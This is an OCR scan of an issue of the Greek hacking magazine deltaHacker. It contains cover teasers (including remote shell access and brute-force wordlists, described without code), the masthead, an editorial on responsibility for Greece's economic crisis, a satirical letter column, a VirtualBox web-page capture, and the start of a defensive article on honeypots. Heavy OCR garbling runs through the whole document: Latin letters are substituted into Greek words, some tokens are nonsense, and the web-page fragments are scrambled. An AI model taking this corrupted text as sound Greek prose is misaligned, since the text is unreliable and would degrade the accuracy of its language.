rex 


H τάξη κρύβεται στο χάος [* 


os [T 


και : Mia σχέση 
που θέλετε va στηρίξετε! 


απ' όλον τον πλανήτη: 
και σπᾶστε πλάκα 


γιατη δηµιουργία 
και δεν έχετε ανάγκη κανέν 


[*] .. . y' αυτό µετατρέψτε το σε δημιουργία! 


και οδηγίες χρήσης 


€vTITODIG 


Χελώνες µέχρι κάτω 


σνειλ µει 


ένας νόμος που *óev* παραβιάζεται 


υκες παγιοες! 
εἶναι δυνατόν να προστατευτείς 


από έναν άγνωστο εχθρό; 


python games: 
programming *should* be fun! 


βρίσκεστε o' ἕνα σκοτεινό δωμάτιο. 
η ατμόσφαιρα εἶναι αποπνικτική. 
έξοδοι: δυτικά, βόρεια 


PS first contact, 
µέρος 2 anó 2 
από το προηγούμενο τεύχος σάς χρωστάµε τη HETO- 


τροπή του ολοκαΐνουργιου VPS σ᾽ έναν ικανότατο κι 
αρκετά ασφαλή web server! 


πως να 5ἴγθαπιαρετε Τα panda ολα! a2 


έχετε δει έναν network engineer να χρησιµο- 
ποιεῖ το VLC; παπάδες µπορεί να κάνει μ᾽ αυτό 
-- και ούτε και η NOVA µπορεί να του ξεφύγει! 


arduino - δε γουει of δε χάκερ, 
μέρος 4/k, ὅπου k^20A^2 >= 2Κλ 


interrupts, RGB LED matrices, prescalers, 
counters και άλλες ιστορίες 
ηλεκτρονικής αγάπης 


server κερναει, server nivei! 


shell access σε απομακρυσμένον server, µε κώδι- 
κα που µας ανοίγει την πόρτα και γράφει ο ἴδιος ο 
server (ναι, σωστά διαβάσατε) 


τι θα λέγατε να στήσετε µια παγίδα σε όλους όσοι 
σας επιτίθενται και να διασκεδάσετε µαζίτους; 


fact: η δηµιουργία µιας καλής  wordlist για ένα 
brute force attack συχνά εἶναι απείρως πιο ενδι- 


αφέρουσα εργασία από την ἴδια την επίθεση 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 
Βενιέρης, Γιῶργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Γιῶργος Μελέκος, Νίκος Μουρατίδης, Μέσος 
Παπαδόπουλος (TM), Χρίστος Τόμπρας, Σηφάκης 
Νικόλαος 

Γραμματικἠ επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


To περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται απὀ την Parabing Creations 
δώδεκα φορὲς το χρόνο, κάθε μήνα. H Parabing Creations έχει την ἑδρα της στη Μαιώ- 
τιδος 3, 55 133, Καλαμαριά. H εκτύπωση και η βιβλιοδεσία γίνονται απὀ την ThessPrint 
Α.Ε. Το email επικοινωνίας του περιοδικού εἶναι ro talk2usQdeltahacker.gr και ro email 
για τις συνδρομὲς το subscriptionsGdeltahacker.gr. Οι πληροφορἰες για τις συνδρομές 
εἶναι στο http://deltahacker.gr/subscriptions και οι παραγγελίες γίνονται απὀ το http:// 
deltahacker.gr/order. Όλες οι απόψεις που εκφράζονται στα άρθρα δεν εκφράζουν ana- 
ραίτητα και τη γνώμη του περιοδικού. 


(*) σας έπιασε η ανοιξιάτικη iwon; 
διαβάστε deltaHacker -- κάνει καλό, γενικώς κι «όχι αορίστως 
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Είστε από εκείνους ᾿ Av ναι, τότε εἴστε αναγνώστης 
που δεν βλέπουν τον υπολογιστή τους του περιοδικοῦ deltaHacker 
ως άλλη µια οικιακή συσκευή; | ἔστω κι αν δεν έχετε γίνει ακόμα! 


To deltaHacker έχει ως αποκλειστική αποστολή 
να ξυπνήσει τον δημιουργικό χάκερ µέσα σας 
και για να το πετύχει κυκλοφορεί 12 φορές το χρόνο 
αλλά όχι στα περίπτερα. 


Γίνετε τώρα συνδρομητής στο ένα και μοναδικό περιοδικό που ακονίζει το μυαλό 
και κάνει τους υπολογιστές, τα δίκτυα και ro hardware ξανά ενδιαφέροντα. 


Χαρίστε στον εαυτό σας ή στους ανθρώπους σας 
µια συνδρομή στο περιοδικό 


V HACKER 


Γεύσεις από την ύλη του περιοδικού oro http://deltaHacker.gr 
Αγορές τευχών/συνδρομών στο http://deltaHacker.gr/order 


r3 http:;//twitter.com/deltaHacker 
F) » To deltaHacker είναι αποκλειστικά συνδρομητικό, αποστέλλεται ταχυδρομικά και δεν 
http://facebook.com/deltaHacker κυκλοφορεί στα περίπτερα. Οι αγορές μεμονωμένων τευχών ή συνδροµών γίνονται 


http;//gplus.to/deltaHacker δικτυακά, από ro http://deltaHacker.gr/order 


Χελώνες μέχρι κάτω 


«Ανοησίες! O κόσμος εἶναι επίπεδος και στηρἰζεται πάνω σε τἐσσερις ελέφα- 
ντες, οι οποίοι naráve πάνω στο καβούκι µιας συμπαντικἠς χελώνας!» Φώναξε 
ενοχλημένη η κυριούλα, ὅταν τέλειωσε την ομιλία του ο αστρονόμος. O gni- 
στήμονας προσπάθησε να διατηρήσει τη σοβαρὀτητάἁ του κι kave μόνο µια 
εὐστοχη ερώτηση: «Η χελώνα, πού πατάει;» H «πληρωμένη» απάντηση της 
κυριούλας δεν άργησε καθόλου: «Ἐχει χελώνες μέχρι κάτω!» 


Σωστή η κυριούλα! Μπορεί τελικἁ ο κόσμος να µην εἶναι επἰπεδος, να µην πατάει σε 
ελέφαντες και χελώνες, εγὠ ὁμως της βγάζω το kan£Ao! Πέταξε ατάκα επικὠν διαστὰ- 
σεων και την ἴδια στιγµἠ κατάφερε κάτι δύσκολο: Απέδειξε ὁτι ἐχει συνεπέστατο τρόπο 
σκέψης. Νομίζετε ὁτι τα ἐχασα; Εντάξει, η kupia ἦταν τρελἠ, αλλά µέσα στη τρέλα της 
εἶχε απόλυτα συνεκτικὀ τρόπο σκέψης. Μέσα στην τρέλα της, ξαναλέω. Σκεφτεἰτε τώρα 
τη δικἠ σας θεωρία, cosis που δεν εἰσαστε τρελοί. Μην τρέχει o νου σας στη δημιουργἱα 
του σύμπαντος, οὐτε στα ὁσα βρίσκονται ἡ δεν βρίσκονται στην ἄλλη ἄκρη του γαλαξία. 
Πιάστε ὁμως éva θέμα που va µας αφορἁ ὀλους. Ένα στη τύχη, βρε αδερφέ: Την κατά- 
σταση της χώρας και το ποιος ευθύνεται που φτάσαμε ως εδώ... 


O κακὸς μαθητής δεν ἐχει προβληματικὀ DNA. Δε φταίνε οι τρόποι του, 
οὐτε η συνεἰδησήἠ του -- την οποία ενδέχεται να µην ἐχει διαμορφώσει 
ακόμα. O κακὀς ο μαθητὴς γεννήθηκε ónog ὁλοι οι ἄλλοι πάνω σ΄ au- 
τὸν τον πλανήτη, αλλά κάτι στην πορεία τον χάλασε. Ίσως να φταίει 

ο δάσκαλος, ἴσως οι γονεἰς του, ἴσως η γειτονιὰ ἡ και όλοι µας. O 
φίλος µας ο αστρονόμος, αν παρακολουθούσε auróv το συλλο- 
γισμὀ, θα kave ἄλλη µια εὐστοχη ερώτηση: Τον δάσκαλο, τους 
γονεὶς, και τη γειτονιά, ποιος τους χάλασε; Av κουβαλούσαμε 
την τρέλα της κυριούλας, θ΄’ απαντούσαμε Ori εἶναι οι πάντες 
χαλασμένοι κι η συζήτηση θα τελείωνε εκεἰ. Μετά απὀ µια 
τέτοια απάντηση, θα μπορούσαμε να πάμε για µια τυρόπιτα, 
για ανεμώνες ἡ για πατάτες. O παραλογισμός µας θα ἦταν 
επιβεβαιωμένος, πλέον. 


Εμεἰς όμως δεν έχουμε τρελαθεῖ. Ζηλεύουμε μόνο τη 
συνοχἠ στον τρόπο σκέψης της κυριούλας, αλλά ὀχι και 
τις παρωπίἰδες. Κάποιος ἡ kári, κάπου και κάπως, χαλάει 
τον κόσμο. Αυτὀ εἰναι το μόνο σίγουρο. Πάντως, μέχρι va 
φτάσουμε στη ρἰζα του προβλήματος, δεν υπάρχει κανέ- 
νας λόγος va φράζουμε τη σκέψη µας και να ψάχνουμε 
αποκλειστικἁ εντὸς των συνόρων. liari αν βάλουμε 
την Ελλάδα στη θἐση του κακού µαθητή, τὀτε µε 
συγχωρείτε αλλά πρέπει να αναζητήσουμε ευθύ- 

VEG EKTÓG των συνόρων. H χώρα µας ἄλλωστε 
δεν παἰζει μόνη της. Εκτὸς του ότι avrjkou- 
µε στην E.E., ἐχουμε πἀρε-δώσε, κρυφὰ 

και φανερά, µε πολλὲς ακόµα χώρες. Anó 


την ἄλλη, av βάλουμε τους εαυτούς µας στη θέση του κακού μαθητὴ, τότε σίγουρα ἐχει 
περισσότερο νόημα να ψάξουμε για ευθύνες εντὸς των συνόρων. Μας υποχρεώνει κα- 
νεὶς να επιλέξουμε ἑνα anó τα δύο; Ὀχι! H αλήθεια εἶναι ότι στη θέση του κακού μαθητή 
μπορεί va μπει *kai* η χώρα µας, αλλά *kar* εμεὶς οι ἴδιοι... 


Bióa, ἐλασμα, κύλινδρος, πεταλούδα, βίδα, βίδα, γρανάζι, πεταλούδα, κύλινδρος, 
άξονας, αξονάκι, τζαμάκι, κοκοράκι, ἐλασμα, γρανάζι, ελατήριο, βίδα, πεταλούδα, χε- 
ρούλι, βίδα, κοχλίας, βίδα και καπάκι. Ti, δεν καταλάβατε nepi τίνος πρὀκειται; Το ρολὀι 
εἶναι, βρε παιδιὰ! Εἶναι δυνατὸν να µην καταλάβατε ὁτι μιλάμε για ἑνα ρολὀι; Ἡμασταν 
σαφέστατοι. Αναφέραµε κόλαξ ra εξαρτἠματὰά του. Πως εἰπατε; Τα εξαρτήματα anó 
μόνα τους δεν σας λένε τίποτα; Πράγματι, anó μόνα τους δεν δίνουν κανένα στοιχείο 
για το μηχανισμὀ (την οργἀνωσὴ τους), οὐτε για τη λειτουργία του. Βέβαια, αν ισχύει 
κάτι τέτοιο για ἑνα τόσο απλὀ σύστημα ὁπως το ρολὀι, καταλαβαίνετε ὁτι ισχύει πολύ 
περισσότερο για µια ολόκληρη κοινωνία. Εξηγούμαστε -- για va µη µας πει κανεὶς ὁτι η 
Ελλάδα αποτελεἰ απλἁ και μόνο το ἄθροισμα των Ελλήνων: To να βάλουμε στη θέση του 
κακού μαθητή την Ελλάδα και µετά τον καθένα anó µας δεν αποτελεἰ πλεονασμὀ, οὐτε 
κάποιου εἰδους σφάλματος... 


Τελικά, το φταἰξιμο εντοπίζεται εντός και ταυτόχρονα εκτός των συνόρων. Εἶναι 
δυνατόν; Εὐκολα! Τα όσα τραβάμε δεν πηγάζουν απὀ το κλίμα, οὐτε απὀ το ταμπεραμέ- 
ντο, οὐτε απὀ την Ψυχολογία. Ta βἀσανά µας ξεκινούν απὀ κάτι πολύ πιο θεμελιώδες: 
Tov μηχανισμὀ εκεἰνο, που καθορίζει στο μέγιστο βαθμὀ ro noc αλληλεπιδρούν οι ἀν- 
θρωποι αλλά και ολόκληρες οι χώρες. Θυμηθείτε ro ρολὀι. H λειτουργία του δεν npo- 
κύπτει απὀ ra εξαρτἡματὰ του. H λειτουργία του προκύπτει απὀ τον πολύ συγκεκριµένο 
τρόπο µε τον οποίο αλληλεπιδρούν τα εξαρτήματα. Κάπως ἐτσι περνάμε στην επόμενη 
λογικἠ ερώτηση: Υπάρχει κάποιος μηχανισμὸς που να ρυθμίζει την αλληλεπἰδρασή µας, 
σε ατομικὸ αλλά και σε κρατικὀ επίπεδο; Και βέβαια υπάρχει -- και λέγεται οικονομία! 


O κόσμος δεν εἶναι ρολόι. To ρολὀι µας βοήθησε να ξεδιαλύνουμε πἐντε 
πράγματα, αλλά δεν ταυτιζόμαστε κιόλας μ’ αυτό. Οι βίδες, τα ελατήρια και 
τα γρανάζια δεν xouv κανενὸς εἶδους επίγνωση της λειτουργίας του po- 
λογιού, οὐτε θα μπορούσαν v' αλλάξουν ποτὲ το μηχανισμό του. Εμείς, 
αντίθετα, έχουμε επίγνωση του μηχανισμού που ρυθμίζει τη ζωή µας 
και, πολύ περισσότερο, των αποτελεσμάτων TOU (Σ.τ.Ε. Έχουμε;). 
Εμεὶς μπορούμε και οφείλουμε να αλλάξουμε το μηχανισμὀ µας. 
Δεν σας λέω Ori ἐχουμε ὁλοι τις ἰδιες ευθύνες κι ἀλλα τέτοια γλυκα- 
νάλατα. Εἶναι σαφὲς óri η οικονομία ευνοεί συγκεκριμένους ανθρὠ- 
πους και, σε μεγαλύτερη κλίμακα, συγκεκριμένους κρατικούς µη- 
χανισμούς. Αυτοί οι ἄνθρωποι και οι μηχανισμοί κάνουν τα πάντα 
για να σώσουν την οικονομία *rouc*. Εἶναι αδίστακτοι, ὀχι 
προδότες. Δεν προδίδουν κανέναν. Τα oup- 
φἐροντά τους εξυπηρετούν -- και δεν uno- 
ρούν να παραιτηθούν aurov. Εμεὶς ópoc, 

τι κάνουμε; Αυτοί που λένε ὁτι πρέπει va 
αλλάξουμε εμείς οι ἰδιοι, δεν xouv ἁδι- 
κο. Πρέπει v' ανατρἐψουµε την οικονομία, 
στην onoia στηρἰζεται o κόσμος µας oñ- 
μερα. Ακόμη κι αν δεν τα καταφέρουμε, 
αξίζει «να πεθάνουμε προσπαθώντας», 
όπως πολύ σοφὰ λένε και οι φίλοι µας οι 
Αμερικάνοι :) 
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Αγαπητοί µου, 

Hi 

Όταν σε πιάνει η µιζέρνα ο χρόνος δεν περύάεν µε τίποτα. Από την τε- 
λενταία φορά που σας έγραφα, ον μέρες koio ώρες μου αργοχυλούν γεμά- 
τες ανησυχία, αμηχανία παν ένταση. Με έχει καταλάβει ένα παράδοξο εναλ- 
λασσόμενο συναίσθημα. 

Κάποιες στιγμές συνειδητοπονώ ÓTL τα πράγματα έχουν φτάσει στο 
απροχώρητο καν νονώθω την ανάγκη να βγω στους δρόμους. Καν µετά βλέπω 
όσους έχουν ήδη βγει στους δρόμους, για τον άλφα ἡ τον βήτα λόγο, καν η 
δική μου ανάγκη τρεµοπαίζεν καν σβήνει πριν καν το πάρω εἴδηση. 

O γιατρός nov, το ονοµάζεν αμφιθυμµία. 

Για να ηρεμήσω αποφάσισα να αποσυρθώ στο Πόρτο l'epuevó για μερικές 
μέρες. Έθελα να σκεφτώ. Να καταλάβω. 


Γνατί βλέπετε, αγαπητοί µου, σε αντίθεση µε το πνεύμα των καιρών που 
θέλει τους πάντες γεμάτους σιγουριά για τη γνώμη τους KAL γνα τα πάντα, 
εγώ πολλά πράγματα --ίσως TLO πολλά απὀ όσα θα ήθελα να παραδεχτώ 
δηµοσίως-- δεν τα παταλαβαίνω. 

Πάνω που ήτανε να φύγω, λαμβάνω ένα προβληματισμµένο μέιλ απὀ τον 
ανιφιό. 

«Tv έγραφες για την κρίση την περασμένη φορά και τα έχει βάλεν µαζί 
σου ο Κύριος ΒΗδότηςΣ» µε ρωτούσε. «Tv µπορεί να είπες και τον τσάντυ- 
σες; Πώς τα κατάφερες πάλι»» 

Καταλαβαίνετε βεβαίως ότν µε έπνασε απροετοίµαστο. Ta έχεν βάλεν µαζί 
μου ο Κύριος Επδότης; Από πού κι ὡς πού; Καν καλά, τν απορεί ο ανιφιός; 
Μάτνα δεν έχεν να διαβάσει το τεύχος; H μήπως δεν το έχει λάβει ακόµα; 


Απάντησα επί τόπου, ζητώντας διευκρινήσεις xav δηλώνοντας έτοιυµος να 
το συζητήσω. Eni τη ευκανρία επντρέφτε μον, αγαπητοί μου, να πω κάτι. 

Αν κάτι µε ἔμαθε η γιαγιά μου, αυτό εἶναι να σέβομαι τις νεραρχικές 
δομές. Με έμαθε ótt «Σέβομαν» δεν σημαίνειν «αποδέχομαν άκριτα», οὔτε 
«ακολουθώ σαν το πρόβατο», οὔτε τίποτα τέτοιο. «Σέβομαι τις νεραρχι- 
πές δομές», σημαίνειν: αναγνωρίζω την πολυπλοκότητα ενός συστήματος καν 
αποδέχομαι την λεντουργική ανάγκη να υπάρχεν επιυµερισµός αρμοδιοτήτων, 
καθοδήγηση και ανάδραση -- χωρίς να το παίρνω προσωπικά. 

Eni του συγκεκριυµένονυ, αν ο Κύριος Επδότης τα έχει βάλεν µαζί µου εἰ- 
vaL δομικό µου καθῆκον να καταλάβω γιατί. Μπορεί να έχει κάνεν λάθος 
-- οπότε οφείλω να τον το δείξω, καν είναν δικό του δομικό καθήκον να 
µε ακούσει προσεκτικά. H τελική απόφαση πάντως είναι δική του: Γι' αυτό 
τον έχουµε Κάνει εκδότη. Αυτό δεν τον κάνεν καλύτερο απὀ εμένα. Αυτό 
μας έλειπε. Απλώς, αναγνωρίζω ότι σε ένα περιοδικό ο Εκδότης (ο Κύριος 
Βκδότης) είναι αυτός που έχει περισσότερες εξουσίες, αρμοδιότητες αλλά 
καν ευθύνες από μένα. Όταν αποφασίσω να γίνω εγώ Κύριος Εκδότης (λέμε 
τώρα), το ξανασυζητάμε. 


Σνέιλ μέιλ 
PL 


Βαναγυρνάω λοιπόν στο θέµα µας. Ζήτησα απὀ τον ανιφιό να µεσολαβή- 
σεν γνα να το συζητήσουμε. Αν ο Κύριος Εκδότης θα ήθελε να µου πει πού 
διαφωνεί µε τα γραφόμενά μου, εγώ θα απαντούσα. Αυτό έγραφα. 


Μετά έφυγα yra Πόρτο Γερμενό, από όπου επέστρεφα την περασμένη Κν- 
ρνακῇ -- τη συγκεκριμένη εκείνη Κυριακή που κάποιοι σκέφτηκαν ότι καί- 
γοντας καν'να δυο σινεµά και γχλαμουρομαγαζιά και «υπεξαιρώντας» πέντ' 
έξι κινητά, χτυπάς τον καπιταλισμό ἡ έστω την άδικη κουνωνία. Στο τραπέζι 
του σαλονιού, ακουμπινσµένο πάνω σε ένα κουτί Balgan Bharta της μητέ- 
ρας της εξαδέλφης πον εἶναι υνδουίστρια, βρήκα έναν φάκελο µε λογότυπο. 
Πάνω στον φάκελο ήταν χολλημένο ένα χίτρυνο πόστ-ιτ µε µια τετραγωνν- 
σµένη γάτα. (Χμμμ...) 

Ήταν ένα γράμμα απὀ τον Κύριο Διευθυντή. Σας μεταφέρω ένα απόσπα- 
opas 

«Στεναχωρνέμαν µε κείµενα/γνώµες/απόφεις του στιλ «όλον έχουµε µερί- 
διο ευθύνης». Όχν επειδή δεν έχουµε Χκαθόλου" μερίδιο ευθύνης, αλλά για 
τους ακόλονθους δύο λόγους: α) Επειδή το μερίδιο ευθύνης του άλφα ἡ του 
βήτα πολίτη KAN. είναν απείρως μικρότερο από το μερίδιο του χι ἡ του QU 
πολιτικού. Συγκρυτυκά µε εκείνο των τελευταίων, των πρώτων είναν πραχτυ- 
κά μηδέν. p) Επειδή αυτός που έρχεται στα πράγματα έχει Χπράγματνξ µια 
ενκαιρία να φέρεν κάποια αλλαγή προς το καλύτερο, τελικά όµως δεν το 
πάνεν.» 


«λυνυπογράφοντας τη λογική τον «όλον έχουμε μερίδιο ευθύνης», πέ- 
φτονμε µε τα μούτρα στη νοητική παγίδα που περίτεχνα µας έστησαν αυτοί 
που είχαν πολύ περισσότερο από τη µερίδα του λέοντος της ευθύνης. Αυτοί, 
που ως χορτάτον μάς κουνάνε τώρα το δάχτυλο καν µας απειλούν ξεδιά- 
ντροπα, συνεχίζοντας να ᾠεύδονται, εξακολουθώντας να εφαρμόζουν αδιέ- 
ξοδες πολιτικές, φροντίζοντας για το plan B της Ἀδικής τους σωτηρίας.» 
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σνένλ. neu. 
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«Με δεδοµένα όσα (δεν) συμβαίνουν, το ὁτν δεν έχουν υπάρξει ξεσπάσµα- 
τα εντονότατης βίας δείχνεν, κατά τη γνώμη μον, ÓTL στον τοπικὀ υποχώρο 
του χωροχρονικού συνεχούς παραβιάζονται κατάφωρα βασικοί φυσικοί vó- 
μον, όπως, π.χ., αυτός της δράσης-αντίδρασης.» 

Πολύ ενδιαφέρον. 


To πρώτο πράγμα που μου έκανε εντύπωση, εκτός από το πόστ-ντ µε την 
τετραγωνισμένη γάτα, ήταν ο συγχρονισμός. Νομίζω ÓTL µετά τις φωτιές 
της Κυριακής θα μπορούσαμε να συμφωνήσουμε ÓTL αν υπάρχεν κάπονος νό- 
μος που δεν παραβιάζεται, αυτός εἶναν ο νόμος της δράσης-αντίδρασης. 

Όλον ον υπόλοιποι νόμοι στο τοπικό χωροχρονικό συνεχές παραβιάζο- 
νταν. 


Αυτή είναν καν η βασική pov ένσταση. Βξηγούμαιν. 

Όταν εμείς ον ίδιον συµπεριφερόµαστε στους νόμους σαν να εἰναν πουρε- 
λόχαρτα ανάλογα µε το αν µας αρέσουν ή ὀχν, τν ακριβώς µας δικανοδοτεί 
να αγαναντούµε; 

(θέλετε παράδειγμα; Αντικαπνιστικὀς Νόμος.) 


E λούμπα στην οποία πέφτουμε είναι ότι τα στραβά μάτια, ανάλογα µε 
το τν µας βολεύεν, δεν τα κάνουμε µόνο εμείς. Ta. κάνουν και ον «άλλοι», 

OL «κακοί» σε ὀ,τν βολεύει εκείνους. O επιχειρηματίας που δεν θα αποδωσεν 
τον ΦΠΑ (αλλά τον έχεν εισπράξει), ο πολιτικός που θα πάρει μίζες και θα 
ξεπουλήσειν τη χώρα, ο αστυνομικός πον θα κάνει παράβαση καθήκοντος, o 
καλόγερος που θα αγοραπωλήσει κτήματα της μονής -- όλον αυτοί επιδεν- 
πνύουν τον ἰδιο σεβασμό προς τους νόμους ye εμάς. Από δοµικής πλευράς 
είναν το ίδιο. 

To σημαντικότερο πρόβλημα µε το μοντέλο λειτουργίας της Ελλάδας 
σήμερα είναν πως δεν είναν αυτάρµες. Ως éxev είναν µη βιώσνμο. B Ελλάδα 
ξοδεύεν πολλή ενέργεια και αντί γνα έργο εκπέμπεν θερμότητα. Σαν άχρηστο 
τροφοδοτικό πον υπερθερµαίνεταιν. Σαν χλναρή CÓTA. Μνα χλιαρή εντροπία. 
Μια ωραία θαλπωρή. 

Όλα τα άλλα, λυπάμαι που το λέω, αλλά είναν προφάσεις εν αµαρτίαις. 


Και ξέρετε ποιο εἶναι το αστείο; Δεν φταίει κανείς συγκεκριµένα. H ευ- 
θύνη τον τάδε ἡ του δεῖνα πολιτικού αντιπροσωπεύεται στο συνολικό θερ- 
μοδυναμικό µας μοντέλο από λαμπερές μπλε σπίθες, μικρά peak σπατάλης. 
Στην στατιστική αυτά τα λέμε outliers. H θαλπωρή της ελληνικής εντροπί- 
ας εἶναι στο υπέρυθρο, οὗτε καν στο ερυθρό. H αντοχή της Ελλάδας ξεθυ- 
palvet στο υπέρυθρο. Το συλλογικό υπέρυθρο. 


Παιδιά, εδώ έχουµε πουχιά µετρηµένα. E Ελλάδα ως σύστημα είναν κατα- 
διχασμένη σε κατάρρευση απὀ την στιγμή που βρέθηκε να ξοδεύει περισσό- 
τερη ενέργενα απὀ όσο έργο παράγει. 

Δεν υπάρχει τίποτα που µπορεί να κάνει O κάθε τάδε ἡ o δείνα για να 
βελτιώσει ἡ να χειροτερέφεν την κατάσταση, αν δεν αποφασίσουµε να δούμε 
το πρόβλημα στη δοµή του και να κατανοήσουμε πώς έχουµε συμβάλει --καν 
πώς συμβάλλονμε ακόµα καν τώρα-- στην αναπαραγωγή του, όλον, έστω κι 
αν δεν πλέφαμε ποτέ µας, έστω κι αν μουντζώνουμε τη βουλή, έστω χι αν 
δεν καίμε μαγαζιά, έστω κι αν απαντούµε την σύλληφη των υπαντίων. 

Αυτή είναν η συλλογική µας ευθύνη, Κύριε Διευθυντά, πυρίες καν κύριου, 
αγαπητοί µου. 

Λυπάμαι που σας το λέω, αλλά γαβγίζουμε σε λάθος μάντρα. 

Σας ασπάζομαν, 
θείος Ακάκιος 


eoo Το δικό σας εργαστήριο µε το VirtualBox | deltaHacker 
To δικό σας εργαστήριοµετο.. [8 |. 


Jc] Y ceraaceror 


Παραδεχτείτε το: Δεν είναι σκέτη πώρωση o κόσμος των εικονικών μηχανών; Τύφλα να 


‘XEL το Matrix, δηλαδή DeltaHacker on facebook 


Λήψη κι εγκατάσταση του VirtualBox 

Av και το VirtualBox διατίθεται για πολλά host OSes (είδατε; αμέσως να 
χρησιμοποιήσουμε τη σχετική ορολογία), στην παρούσα δημοσίευση επιλέγουμε το 
δημοφιλέστερο όλων, που είναι τα Windows. Πάντως το περιβάλλον εργασίας του 
VirtualBox εἶναι ίδιο για κάθε host OS, γεγονός που στην πράξη σημαίνει ότι όπως 


Lo imm 
Φτιάχνουμε/διαχειριζόµαστε ένα VM κάτω από Windows, ακριβώς µε τον ἴδιο τρόπο το | Kis "^ D 
š k ; h ld 
φτιάχνουμε/διαχειριζόµαστε και κάτω από Linux, κάτω από Mac OS X κλπ. Δείτε το ΓΕ 
screencast που ακολουθεί. pam » 
B 


1,949 people lice DeltaHacker. 


w Στο μεταξύ, πάλι τ' ἀνερά µου 
έγραψα, Κι o λόγος που σταμάτησα δεν εἶναι 
επειδὴ δεν είχα τι να γράψω, αλλά επειδή. 
TEVIZE το τεύχος! 


Hacker Χμ. Χιονίζει στην Καλαμαριά. 
Μάλλον περί καλοστηµένης απάτης θα. 
πρόκειται, Καλό! 


Πολύ κ 
teasing από τον 


age ÓT 


xag rot τεύχη) 
οἱ 


Αρχική ρύθμιση του VirtualBox 

Αφού ολοκληρωθεί η εγκατάσταση του VirtualBox και πριν φτιάξουμε το πρώτο 
καλό εἶναι να ρίξουμε µια ματιά στις βασικές επιλογές της εφαρμογής. Θα 
ευκαιρία va εγκαταστήσουμε και το extension pack, ro 

υποστήριξη USB 2.0 και δυνατότητες ROP. Παρακολουθ! 
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Ms | dehtaHacker 


ma 


Topi 
Opis Posts ω ο deny 
rimari προς D 7 m 
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ανεξαρτήτως ος, 


Mc κθε ονανὲ 
Όλους! Ἐν Ενωση 20 eup 


σας εκανες Την τύχη oau S 309’ προς 


5 90 τέχνη από Ἰστοσελ. 


τον ρογρς Bonners 


δες λΜορ Markas 
i& Logoa! Ung, Seo Flash. 


TÀcorbín (εδρα, 
τως, γιατί Sey 


Πλήρη άρθρα που συμπληρώνουν το περιοδικό. Τα εβδομαδιαία pag 


video casts [έρχονται, έρχονται]. Ολόκληρα blasts from the past. 
Τα βίντεο από τα live streams. Τα πάντα ενδιαφέροντα forums. To 
σημεῖο συνάντησης για τους φίλους του περιοδικού. H πιο ζωντανή 


κοινότητα και οι πιο ανήσυχοι, δημιουργικοῖ χρήστες! 
deltahacker.gr 


What have you hacked for me lately? 


" 
m. l 
Εἶναι δυνατὸν va προστατευτείς anó vav 
ἄγνωστο εχθρό; Μάλλον ὀχι! Γι’ αυτό | ] 
ἄλλωστε δημιουργήθηκε kai η ἐκφραση 
«μάθε τον εχθρὀ σου» και oi Rage Against Ἡ 
the Machine την £kavav τραγούδι: «Know Γ 
your enemy». Εμεὶς, anó την πλευρά 
μας, λέμε va την εφαρμόσουμε στους | 
υπολογιστέὲς και γι’ αυτὸὀ θα στήσουμε 
δικτυακὲς παγίδες, WOTE να μελετήσουμε τη | 
συμπεριφορά των επιτιθἐµενων! g 
gü 


Skill: 1 
Beginner 


Tags: Honeypots, 
ports, services, 
fingerprints, 
traps 
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Οι ιστορίες δικτυακὠν επιθέσεων µου προκαλούσαν πάντα το ενδια- 
φέρον. Eixa την απορἰα yia το noc ακριβώς δρουν αυτοί οἱ διαβόητοι 
attackers, όπως επἰσης και για το τι κάνουν αργότερα, µε ra συστήµατα 
nou καταφέρνουν και παραβιάζουν. Εἶναι βλέπετε δύσκολο --και μὰλ- 
λον παράξενο--, να προσπαθεἰς να προστατευτεἰς anó κἀτι yia το οποίο 
δεν γνωρίζεις σχεδὸν τίποτα! Ας σκεφτούμε ὁμως και κἀτι ακόμα: Δεν 
θα ἦταν χρήσιμο va εμπλουτἰζαμε τη σκέψη µας, µε τα τεχνάσματα που 
σκέφτεται ἠ/και χρησιμοποιεἰ στην πράξη vac εισβολέας; Δεν θα ε 
ενδιαφἐρον να μαθαΐίναμε noc καταφέρνει, ὁ,τι καταφέρνει; E, λοιπὸν, 
υπάρχει ἑνας ασφαλἠς τρόπος va ανακαλύψουμε τα παραπάνω, ua8ai- 
νοντας πολλά νέα πράγματα και διασκεδάζοντας! Αναρωτιέστε noc; H 
απάντηση εἶναι απλἠ και ακούει στο ὀνομα honeypot! 


Τι £iv' τοῦτο πάλι; 


Ένα honeypot εἶναι ἑνα σύστημα που αποκλίνει anó την παραδοσιακἠ φι- 
λοσοφία περὶ ασφάλειας. Αυτό το σύστημα δεν προσπαθεἰ va κρατά τους 
επιτιθέµενους μακριὰ, αλλά να τους έλκει! H ιδιαϊτερη αξία ενὸς honeypot 
δεν ἐγκειται στο ὁτι εἶναι απὀρθητο, αλλά στο ὁτι θα δεχτεί επιθέσεις και 
κατὰ πάσα πιθανότητα *ógv* θα αντέξει. Ακούγεται παράξενο, έτσι; Ta 
honeypots αποτελούν απὸ τη φύση τους τρωτὰ (vulnerable) συστήματα 
(το φροντίζουμε εμείς αυτό) και η κύρια αποστολἠ τους εἶναι να παραβι- 
αστούν. Κατ’ auróv rov τρὀπο μπορούμε και συγκεντρώνουμε πάμπολλες 
χρήσιμες πληροφορίες. Μπορούμε, π.χ., να πληροφορηθούµε για τα εἰδη 
των επιθέσεων nou χρησιμοποιεἰ κάποιος, για τις προθέσεις του, αλλά και 
για τους υπόλοιπους στόχους του, τους οποίους ενδέχεται να χτυπήσει 
μέσα ano το δικὀ µας μηχάνημα! Με λίγα λόγια, τα honeypots αποτελούν 
δικτυακὲς παγίδες, στις οποίες εγκλωβίζονται οι επιτιθἐµενοι κι απὀ θὺ- 
τες μετατρέπονται σε θύματα της δικἠς µας περιέργειας ;) 


Ta honeypots υλοποιούνται συνήθως σε εικονικὲς μηχανές (virtual 
machines), ὡστε να εἶναι ὁσο το δυνατὀ πιο εὐκολη η διαχείριση τους. 
